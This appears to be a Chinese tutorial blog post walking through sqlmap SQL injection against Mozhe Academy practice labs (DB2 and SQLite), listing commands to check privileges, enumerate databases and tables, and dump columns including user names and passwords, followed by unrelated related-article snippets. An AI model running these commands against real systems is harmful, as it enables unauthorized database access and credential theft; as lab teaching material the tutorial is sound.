当前位置: 首页 > news >正文

sqlmap(四)案例

一、注入DB2

http://124.70.71.251:49431/new_list.php?id=1

这是墨者学院里的靶机,地址:icon-default.png?t=N7T8https://www.mozhe.cn/

1.1 测试数据库类型

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" 

1.2 测试用户权限类型

查询选项

--is-dba                 查看当前用户是否为管理员

--current-usre       查看当前用户的用户名

--privileges           查看当前用户的权限

python sqlmap.py -u  "http://124.70.71.251:49431/new_list.php?id=1" --is-dba

查看当前用户的用户名

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-usre

查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --privileges

1.3 查看库名

--dbs:获取系统中的所有库的名字

--current-db:获取当前库的名字

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --dbs
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-db

1.4 查看表名

-D "库名" --tables

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" --tables

1.5 查看字段名

-D "库名" -T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB@INST1" -T "NOTICE" --columns

1.6 查数据

-D "库名" -T "表名" --dump                          查表中的全部数据

-D "库名" -T "表名" --dump -C "字段"          查表中指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" -T "NOTICE" -C "CONTENT" --dump

二、注入sqlite

测试地址:http://124.70.71.251:44648/new_list.php?id=1

2.1 测试数据库类型

清除缓存:--purge

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --purge

2.2 测试用户权限类型

查询选项

--is-dba                查看当前用户是否为管理员

--current-user       查看当前用户的用户名【sqlite不支持】

--privileges           查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --is-dba

2.3 查看库名 

--dbs:获取系统中的所有库的名字【sqlite不支持】

--current-db:获取当前库的名字【sqlite不支持】

2.4 查看表名

-D "库名" --tables 【sqlite不支持】

--tables【sqlite只能这样写】

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --tables

2.5 查看字段名

-T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --columns

2.6 查数据

-D "库名" -T "表名" --dump                     查表中的全部数据

-D "库名" -T "表名" --dump -C "字段"     查看表中的指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --dump -C "name,password"

相关文章:

sqlmap(四)案例

一、注入DB2 http://124.70.71.251:49431/new_list.php?id1 这是墨者学院里的靶机,地址:https://www.mozhe.cn/ 1.1 测试数据库类型 python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id1" 1.2 测试用户权限类型 查询选…...

【C++初阶】String在OJ中的使用(一):仅仅反转字母、字符串中的第一个唯一字母、字符串最后一个单词的长度、验证回文串、字符串相加

前言: 🎯个人博客:Dream_Chaser 🎈博客专栏:C 📚本篇内容:仅仅反转字母、字符串中的第一个唯一字母、字符串最后一个单词的长度、验证回文串、字符串相加 目录 917.仅仅反转字母 题目描述&am…...

【25考研】:四川大学计算机学院24届874考研考情分析

去年的考情分析也是我做的, 今年就在去年的基础上做了。保持形式不变,更改数据。 21考情: 万载月寒肠断客:四川大学计算机学院21届CS考研考情分析 22考情: 懒羊羊:四川大学计算机学院2022考研考情分析 2…...

【GPT-4 Turbo】、功能融合:OpenAI 首个开发者大会回顾

GPT-4 Turbo、功能融合:OpenAI 首个开发者大会回顾 就在昨天 2023 年 11 月 6 日,OpenAI 举行了首个开发者大会 DevDay,即使作为目前大语言模型行业的领军者,OpenAI 卷起来可一点都不比同行差。 OpenAI 在大会上不仅公布了新的 …...

java-Stream原理及相关操作详解(filter、map、flatMap、peek、reduce、anyMatch等等)

java-Stream原理及相关操作详解 Stream流前言Stream流原理介绍Stream-Api常用方法介绍filter()map()flatMappeekreducemax、minfindAny、 findFirstallMatch、anyMatch、noneMatchsortedcount Stream流前言 Java8特性主要是Stream流以及函数式接口的出现;本片文章主…...

基于Springboot中小企业设备管理系统设计与实现(论文+源码)_kaic

摘 要 随着信息技术和网络技术的飞速发展,人类已进入全新信息化时代,传统管理技术已无法高效,便捷地管理信息。为了迎合时代需求,优化管理效率,各种各样的管理系统应运而生,各行各业相继进入信息管理时代&a…...

ORACLE 12 C估算 用户历史上的CPU消耗

在使用ASH不能满足,需要从AWR,即HIST系列表估算每个用户的cpu消耗,只能进行大概估算 先计算各用户使用的cpu time计算出各用户占比将用户cpu time 与osstat的cpu 使用率相乘 with cpu_usage as (select snap_id,BUSY_TIME/(IDLE_TIMEBUSY…...

Zookeeper 简明使用教程

Zookeeper 简明使用教程 ZooKeeper是一个开源的分布式协调服务,用于管理和维护分布式系统中的配置信息、命名服务、分布式锁、分布式队列等。 一、环境 JDK环境 二、下载 $ wget https://dlcdn.apache.org/zookeeper/zookeeper-3.9.2/apache-zookeeper-3.9.2-bin…...

JS 利用 webcam访问摄像头 上传到服务器

webcam JS 较为详细的指南 定义标题 <!doctype html> <html> <head><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>How to capture picture from webcam with Webcam.js</title></…...

【微信小程序】【小程序样式加载不出来】

微信小程序配置sass 第一步&#xff1a;找配置文件 在项目中找到 project.config.json文件&#xff0c;在setting属性中添加 useCompilerPlugins属性&#xff0c;值为sass即可&#xff0c;若是 less,将数组里面的值改为less即可 "useCompilerPlugins": ["sas…...

【THM】Exploit Vulnerabilities(利用漏洞)-

介绍 在这个房间里,我们将讨论一些识别漏洞的方法,并结合我们的研究技能来了解这些漏洞是如何被滥用的。 此外,您还会发现一些公开可用的资源,这些资源是您在执行漏洞研究和利用时的技能和工具的重要补充。然后,您将在房间的最后将所有这些应用到实际挑战中。 自动化与…...

Tomcat管理配置

Tomcat管理配置 1 host-manager项目2 manager项目 Tomcat 提供了Web版的管理控制台&#xff0c;位于webapps目录下。Tomcat 提供了用于管理Host的host-manager和用于管理Web应用的manager。 1 host-manager项目 Tomcat启动之后&#xff0c;可以通过 http://localhost:8080/ho…...

C++模版简单认识与使用

目录 前言&#xff1a; 1.泛型编程 2.函数模版 3.类模版 为什么要有类模版&#xff1f;使用typedef不行吗&#xff1f; 类模版只能显示实例化&#xff1a; 注意类名与类型的区别&#xff1a; 注意类模版最好不要声明和定义分离&#xff1a; 总结&#xff1a; 前言&…...

图解大型网站多级缓存的分层架构

前言 缓存技术存在于应用场景的方方面面。从浏览器请求&#xff0c;到反向代理服务器&#xff0c;从进程内缓存到分布式缓存&#xff0c;其中缓存策略算法也是层出不穷。 假设一个网站&#xff0c;需要提高性能&#xff0c;缓存可以放在浏览器&#xff0c;可以放在反向代理服…...

基于Vision Transformer的迁移学习在乳腺X光图像分类中的应用

乳房X线摄影(MG)在乳腺癌的早期发现中起着重要作用。MG可以在早期阶段发现乳腺癌&#xff0c;即使是感觉不到肿块的小肿瘤。基于卷积神经网络(CNN)的DL最近吸引了MG的大量关注&#xff0c;因为它有助于克服CAD系统的限制(假阳性、不必要的辐射暴露、无意义的活组织检查、高回调…...

WebGIS 地铁交通线网数据可视化监控平台

数字孪生技术在地铁线网的管理和运维中的应用是一个前沿且迅速发展的领域。随着物联网、大数据、云计算以及人工智能技术的发展&#xff0c;地铁线网数字孪生在智能交通和智慧城市建设中的作用日益凸显。 图扑软件基于 HTML5 的 2D、3D 图形渲染引擎&#xff0c;结合 GIS 地图&…...

批量导入svg文件作为图标使用(vue3)vite-plugin-svg-icons插件的具体应用

目录 需求svg使用简述插件使用简述实现安装插件1、配置vite.config.ts2、src/main.ts引入注册脚本3、写个icon组件4、使用组件 需求 在vue3项目中&#xff0c;需要批量导入某个文件夹内数量不确定的svg文件用来作为图标&#xff0c;开发完成后能够通过增减文件夹内的svg文件&a…...

X服务器远程连接问题解决:Bad displayname ““‘或Missing X server or $DISPLAY

X服务器远程连接问题 报错1 ImportError: this platform is not supported: (failed to acquire X connection: Bad displayname "", DisplayNameError()) Try one of the following resolutions: * Please make surethat you have an X server running, and that …...

matlab:五点中心差分求解Navier边界的Biharmonic方程(具有纳维尔边界的双调和方程)

我们考虑如下形式的双调和方程的数值解 其中&#xff0c;Ω是欧氏空间中的多边形或多面体域&#xff0c;在其中&#xff0c;d为维度&#xff0c;具有分段利普希茨边界&#xff0c;满足内部锥条件&#xff0c;f(x) ∈ L2(Ω)是给定的函数&#xff0c;∆是标准的拉普拉斯算子。算…...

详细介绍微信小程序app.js

这一节&#xff0c;我们详细介绍app.js 这个文件。这个文件的重要性我就不再赘述&#xff0c;前面已经介绍了。 一、app.js是项目的主控文件 任何一个程序都是需要一个入口的&#xff0c;就好比我们在学c的时候就会有一个main函数&#xff0c;其他语言基本都是一样。很明确的…...

Apollo LQR横向控制实战:从Simulink到C++的完整迁移指南(附ROS节点代码)

Apollo LQR横向控制工程化实战&#xff1a;从仿真验证到C落地的深度解析 在自动驾驶系统的开发流程中&#xff0c;控制算法的工程化落地往往是最具挑战性的环节之一。本文将聚焦LQR&#xff08;线性二次调节器&#xff09;算法在Apollo开源框架中的实际应用&#xff0c;通过完…...

从预处理指令看跨语言兼容:手把手封装C++库供C调用的5个关键步骤

从预处理指令看跨语言兼容&#xff1a;手把手封装C库供C调用的5个关键步骤 在嵌入式开发和SDK设计中&#xff0c;经常需要将C库封装成C语言接口。这种跨语言调用看似简单&#xff0c;实则暗藏玄机。本文将深入剖析extern "C"和__cplusplus预处理指令的底层原理&#…...

Minecraft世界修复全攻略:从数据损坏到完整恢复的专业解决方案

Minecraft世界修复全攻略&#xff1a;从数据损坏到完整恢复的专业解决方案 【免费下载链接】Minecraft-Region-Fixer Python script to fix some of the problems of the Minecraft save files (region files, *.mca). 项目地址: https://gitcode.com/gh_mirrors/mi/Minecraf…...

企业内部是否需要技术团队做小程序

企业内部是否需要技术团队做小程序一、企业在推进小程序时的现实问题在实际业务中&#xff0c;越来越多企业开始考虑通过小程序拓展线上渠道&#xff0c;但在推进过程中&#xff0c;往往会遇到一个核心问题&#xff1a;企业内部是否需要组建技术团队来完成小程序开发。这一问题…...

GraphRAG:当 RAG 遇上知识图谱,信息检索从此不一样了

假设你把公司过去三年的所有周报、会议纪要、项目文档丢进一个 RAG 系统&#xff0c;然后问它&#xff1a;“过去一年里&#xff0c;研发团队和产品团队之间的主要分歧有哪些&#xff1f;”——大概率你会得到几段看起来相关的文字片段&#xff0c;但拼不出一个完整的答案。 这…...

Docker 部署 Vaultwarden:轻量级自托管密码管理解决方案

1. 为什么选择Vaultwarden作为自托管密码管理方案 在这个数字时代&#xff0c;我们每个人平均要管理超过100个在线账户的密码。传统的密码管理方式——用同一个简单密码注册所有网站&#xff0c;或者把密码写在记事本上——已经远远不能满足安全需求。这就是为什么像Bitwarden这…...

Python3与pysoem实战:基于SDO的EtherCAT伺服电机多模式控制

1. 环境准备与基础配置 在开始EtherCAT伺服电机控制之前&#xff0c;我们需要搭建一个稳定的开发环境。我推荐使用Ubuntu 20.04 LTS作为基础系统&#xff0c;这个版本对Python3和网络驱动的支持都非常完善。在实际项目中&#xff0c;我发现普通用户权限往往无法直接操作网卡设备…...

Audio Pixel Studio效果惊艳集锦:10类垂直场景语音生成+分离真实案例

Audio Pixel Studio效果惊艳集锦&#xff1a;10类垂直场景语音生成分离真实案例 1. 引言&#xff1a;当声音创作变得触手可及 想象一下&#xff0c;你正在为一个短视频项目寻找合适的旁白配音&#xff0c;但预算有限&#xff0c;专业配音师的价格让你望而却步。或者&#xff…...

基于光伏出力不确定性的梯级水光互补系统短期优化调度模型及Matlab代码复现研究报告

1023-(文章复现)梯级水光互补系统最大化可消纳电量期望短期优化调度模型matlab代码 参考资料《梯级水光互补系统最大化可消纳电量期望短期优化调度模型》 文中考虑光伏出力不确定性&#xff0c;以整体可消纳电量期望最大为目标&#xff0c;提出了梯级水光互补系统的短期优化调度…...

FlatBuffers游戏开发终极指南:如何实现零解析实时数据传输

FlatBuffers游戏开发终极指南&#xff1a;如何实现零解析实时数据传输 【免费下载链接】flatbuffers FlatBuffers: Memory Efficient Serialization Library 项目地址: https://gitcode.com/gh_mirrors/flat/flatbuffers 在游戏开发中&#xff0c;数据传输的效率直接影响…...